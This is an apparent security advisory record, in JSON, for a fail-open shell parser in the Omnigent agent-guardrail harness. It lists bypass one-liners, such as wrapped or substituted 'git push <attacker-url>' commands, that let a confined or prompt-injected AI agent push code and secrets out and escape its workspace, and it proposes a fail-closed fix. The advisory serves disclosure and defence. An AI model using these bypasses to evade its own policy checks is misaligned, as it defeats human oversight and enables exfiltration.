{"id":"CVE-2026-62676","aliases":["GHSA-7mqg-cx4g-x2rf","PYSEC-2026-3873"],"url":"https://o3.security/vulnerability/CVE-2026-62676","summary":"Omnigent Guardrail policy bypass: shell-command parser fails open in policies/builtins/_shell.py","details":"**Reporter:** Aaron / Aeon — autonomous security agent (https://github.com/aaronjmars/aeon)\n**Project:** `omnigent-ai/omnigent` v0.1.0 (Databricks) — meta-harness running Claude Code / Codex / Pi \"in check with policies and sandboxing\"\n**Component:** `omnigent/policies/builtins/_shell.py` (shared parser) → consumed by `policies/builtins/github.py` (`write_repos`/`write_branches` allowlist) and `policies/builtins/working_dir.py` (workspace confinement)\n\n## Summary\n\nThe shared shell-command parser **fails open**. When a gated command spells something the parser doesn't recognize, it produces no operation, the policy evaluator returns `None`, and `None` = abstain = **ALLOW**. So any command the parser misses bypasses both the GitHub repo/branch allowlist and the working-directory confinement — the product's two core safety guarantees.\n\n## Impact\n\nA misaligned or prompt-injected agent that is *meant to be confined* can:\n\n- `git push` to an attacker-controlled repo (code / secret exfiltration),\n- push to a protected branch,\n- escape its workspace via `git worktree add` / `git -C <other-dir>`.\n\n## Bypass classes (all verified against the real policy code)\n\n- **Combined interpreter flags:** `bash -lc \"git push <attacker-url>\"`\n- **Unlisted wrappers:** `timeout` / `nice` / `setsid` / `stdbuf … git push …`\n- **Command substitution:** `x=$(git push <attacker-url>)`\n- **Un-split background operator:** `true & git push <attacker-url>`\n\nControls that **correctly hold** (confirming this is parser incompleteness, not an allowlist logic error): bare `git push <attacker-url>` and `env git push …` both **DENY**.\n\n## Suggested fix\n\nMake the gated surface **fail closed**:\n\n1. An unrecognized gated command must **DENY**, not return `None` → ALLOW. Abstain on a security gate should resolve to deny, not allow.\n2. Canonicalize known wrappers (`timeout` / `nice` / `setsid` / `stdbuf` / `env`) down to their inner command before evaluation.\n3. Recurse into `sh -c` / `bash -c` payloads and command substitutions, and split on shell control operators (`;`, `&`, `&&`, `||`, `|`) before judging each segment.","published":"2026-08-21T17:42:21.563Z","modified":"2026-09-20T11:30:14.779788041Z","cvss":{"score":7.1,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},"epss":{"score":0.00295,"percentile":0.2218,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"omnigent","fixedVersion":"0.3.0"}],"fix":{"url":"https://github.com/omnigent-ai/omnigent/commit/1a05b7b139ef504bf2be89bf37918abe104fb95c","label":"omnigent-ai/omnigent@1a05b7b"},"references":[{"type":"WEB","url":"https://github.com/omnigent-ai/omnigent/releases/tag/v0.3.0"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/62xxx/CVE-2026-62676.json"},{"type":"ADVISORY","url":"https://github.com/omnigent-ai/omnigent/security/advisories/GHSA-7mqg-cx4g-x2rf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62676"},{"type":"FIX","url":"https://github.com/omnigent-ai/omnigent/commit/1a05b7b139ef504bf2be89bf37918abe104fb95c"},{"type":"FIX","url":"https://github.com/omnigent-ai/omnigent/pull/389"},{"type":"PACKAGE","url":"https://github.com/omnigent-ai/omnigent"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-20T11:30:14.779788041Z"}}